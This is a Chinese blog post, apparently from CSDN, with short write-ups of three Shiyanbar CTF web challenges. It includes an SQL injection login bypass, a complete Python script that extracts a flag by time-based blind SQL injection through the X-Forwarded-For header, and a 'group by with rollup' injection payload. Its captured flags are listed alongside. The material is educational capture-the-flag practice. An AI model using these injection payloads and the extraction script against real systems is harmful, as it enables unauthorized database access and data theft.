实验吧ctf

最新推荐文章于 2024-01-27 10:00:00 发布
最新推荐文章于 2024-01-27 10:00:00 发布
阅读量3.2k 收藏 3
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cwtv123/article/details/76098017
版权

1/登陆一下好吗??

http://ctf5.shiyanbar.com/web/wonderkun/web/index.html
 ='
 ='
 ctf{51d1bf8fb65a8c2406513ee8f52283e7}

2/who are you ?
http://ctf5.shiyanbar.com/web/wonderkun/index.php

 import requests
import time
payloads='abcdefghijklmnopqrstuvwxyz0123456789@_.{}-'
flag = ''
def exp(x,i):
    starttime=time.time()
    url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
    xxx = "' or sleep(ascii(mid((select(flag)from(flag))from("+str(x)+")for(1)))=ascii('"+i+"')) and '1'='1"
    headers = {
    "Host": "ctf5.shiyanbar.com",
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding": "gzip, deflate",
    "Connection": "keep-alive",
    "X-FORWARDED-FOR": xxx
    }
    res = requests.get(url, headers=headers)
    s = time.time() - starttime;
    if s > 1:
        return 1
    else:
        return 0
for x in range(1,33):
    for i in payloads:
        if (exp(x,i)):
            flag+=i
            print flag
            break
        else: 
            pass
print 'flag:'+flag

 ctf{cdbf14c9551d5be5612f7bb5d2867853}

3/因缺思汀的绕过

 http://ctf5.shiyanbar.com/web/pcat/index.php
 uname=d%27or 1=1 group by pwd with rollup limit 1 offset 2
最低0.47元/天 解锁文章
四盘山
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf 实验吧 后台登录
qq_42777804的博客
08-06 1915
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Document</title> </head> <body style="background-color: #999"> <div style=...
CTF实验吧-WEB专题-5
qq_18661257的专栏
12-22 6021
1.上传绕过 题解 题目说是绕过,那就绕过吧,发现,上传除了php文件外会报需要传php文件,而传php文件则会报必须上传.jpg这些图片文件,那就从上传漏洞开始吧,一般常见的上传漏洞就是截断了,是0x00数据会截断后续数据,当数据为abc.php0x001.jpg时,服务器会处理为abc.php,而0x00后的数据会忽略(产生原因magic_quotes_gpc未打开,同时相关数据没有进行处理
CTF实验吧-WEB专题-2
qq_18661257的专栏
12-19 7542
1.简单的sql注入之2 题解 我们先单引号试一下发现报错,所以基本存在注入,然后我们用空格会爆SQLi detected!因此被过滤了,发现+还是%a0这些编码都会报错,所以只能用万能空格替代/**/,然后测试是否含有flag表,接着测试是否含有flag列,然而并没有什么卵用,因为这货竟然过滤了左右括号,无法用exists判断flag表是否存在,同时由于左右括号不能用,为了让判断flag表存在
CTF-实验吧Once More
才不是小弱鸡的博客
05-10 1175
题目地址:http://www.shiyanbar.com/ctf/1805这是题目的提示,根据社会工程学的方法找到了ereg的漏洞(其实就是百度。。。)漏洞是ereg函数存在截断漏洞。这里表示输入的password必须是大小写字母和数字这句表示password长度要小于8且大小要大于9999999,这不是自我矛盾嘛嘤嘤嘤。其实这里可以用科学记数法传参,password=1e9就行啦~这句表示pa...
ctf实验吧,后台登陆wp
qq_42728977的博客
07-29 374
暑假刷题系列: 看到这道题的界面大致判断是注入 输入’ or 1=1,无果后,看看源码吧,右键看源码,如下: <!-- $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'"; $result=...
CTF-隐写术(八)
→_→
09-21 2556
声明:以下CTF题均来自网上收集,在这里主要是给新手们涨涨见识,仅供参考而已。需要题目数据包的请私信或在下方留言。 15.复杂的QR_code(来源:实验吧) 1.关卡描述 2.解题步骤 分析: 1.下载图片,发现是一个二维码,尝试扫描,看到“secret is here” 2.既然是一个隐写的题,选择binwalk 处理一下这个图片 发现里面是一个zip文件 或者用winhex打开: ...
04.实验CTF实战之WEB渗透和隐写术解密1
08-03
【网络安全自学篇】WEB渗透与隐写术解密——实验CTF实战解析 在网络安全领域,WEB渗透是指通过寻找并利用网站应用的漏洞来获取未经授权的访问或控制权限。而隐写术则是指在图像、音频或其他媒体中隐藏信息的技术...
实验吧题目详情.xlsx
09-05
2019年9月5日抓取的实验吧的CTF训练营中一共234道题的详细信息。
实验吧证明自己吧WB
02-16
实验吧题目“证明自己吧“的详细解答,自己总结的,内容详尽。
实验吧-ctf-misc-附件资源
03-02
实验吧-ctf-misc-附件资源
18.10.4 实验吧----whatamitoyou
qq_42192672的博客
10-04 2104
提示是你会唱歌么,一脸懵逼 打开可以看到是一个elf文件,我自己转到了虚拟机里面去下载 下载下来后想直接运行一下,说我权限不够,也不明白是为什么,直接chmod +x 拖进IDA看一下吧,靠字符串定位(Your password is tjctf{) 也不知道是不是彩蛋,我们看看歌词吧 Do you think I don't understand? 是的,我的确没看懂……………… ...
CTF题库-实验吧(密码学)之综合篇
qq_37992321的博客
12-02 3768
版权声明:如果对大家有帮助,大家可以自行转载的。原文链接: 1.CTF比赛常用在线转码网站: ASCII 在线转换器:http://www.ab126.com/goju/1711.html 各种密码加密与解密:http://www.zjslove.com/3.decode/ 在线加密解密 encode &amp;amp;amp; decode:http://encode.chahuo.com/ MD5:https...
实验吧-ctf-misc
zhang14916的博客
07-22 6164
1.欢迎来到地狱 用winhex对第一个jpg文件补头,获取网址https://pan.baidu.com/s/1i49Jhlj,打开得到音乐文件,用Audacity打开获取摩斯电码,破解,获得密码KEYLETUSGO,打开word文档,查看隐藏字符获得image steganography提示,用网页版image steganography解密文档中的哈士奇图片,获得key{you are i...
CTFCTF竞赛介绍以及刷题网址
最新发布
wangluoanquan111的博客
01-27 2263
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。为了方便称呼,我们把这样的内容称之为“Flag”。PWN(溢出):PWN在黑客俚语中代表着攻破,取得权限,在CTF比赛中它代表着溢出类的题目,其中常见类型溢出漏洞有栈溢出、堆溢出。
小白怎么入门CTF,看这个就够了(附学习笔记、靶场、工具包下载)
m0_74131821的博客
05-31 7014
CTF靶场:CTF刷题,在校生备战CTF比赛,信安入门、提升自己、丰富简历之必备(一场比赛打出好成绩,可以让你轻松进大厂,如近期的各种CTF杯),在职人员可以工作意外提升信安全技能。
[网络安全自学篇] 四.实验CTF实战之WEB渗透和隐写术解密
热门推荐
杨秀璋的专栏
08-06 1万+
上一篇文章分享了解BurpSuite工具的安装配置、Proxy基础用法,并分享一个简单的暴库案例;本篇文章分享实验吧CFT实战的题目,涉及WEB渗透和隐写术常见题型,包括“这是什么”、“天网管理系统”、“忘记密码”、“false”、“天下武功唯快不破”和“隐写术之水果、小苹果”。非常有意思的文章,作为在线笔记,希望对入门的博友们有帮助,大神请飘过,谢谢各位看官!
ctf-实验吧-crypto
zhang14916的博客
07-27 4656
1.trivial 下载文件解压,得到一个py文件,里面又一个加密算法,这是一个类移位加密,加密算法的key和加密之后的密文已知,然后对每个明文在不同范围内进行移位加密,直接解密即可 #!/usr/bin/env python import sys alphaL = "abcdefghijklnmopqrstuvqxyz" alphaU = "ABCDEFGHIJKLMNOPQRSTUVQ...
实验ctf题库:这个看起来有点简单!
qq_30990005的博客
06-17 6413
       查看这道题先登陆“实验吧”,地址为 http://www.shiyanbar.com/ctf/33 。       这是一道十分基础的web题目,因为我也是刚刚接触ctf,记录一下第一道题的解题过程,算是自己的一个回顾吧,同时也给一些想要入门的朋友一点点微弱的参考吧。一、sqlmap的安装       在windows下安装sqlmap需要先下载适用windows的sqlmap版本和...
实验ctf:
释晓的博客
09-25 603
一、后台登录: 格式:flag:{xxx} http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 解题思路:查看源码,代码审计 想到构建万能密码,1‘ or ’1‘=’1,  但md5加密无法构建万能密码 发现链接字符,输入试一下,竟然出现flag  ...
网络安全自学笔记:实验CTF实战-WEB渗透与隐写术解析
实验CTF实战之WEB渗透和隐写术解密1"这个主题涵盖了两个关键知识点:WEB渗透和隐写术。WEB渗透是指通过发现和利用网站应用程序的安全漏洞来获取未经授权的访问或控制权限。而隐写术则是指在图像或其他媒体中隐藏...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值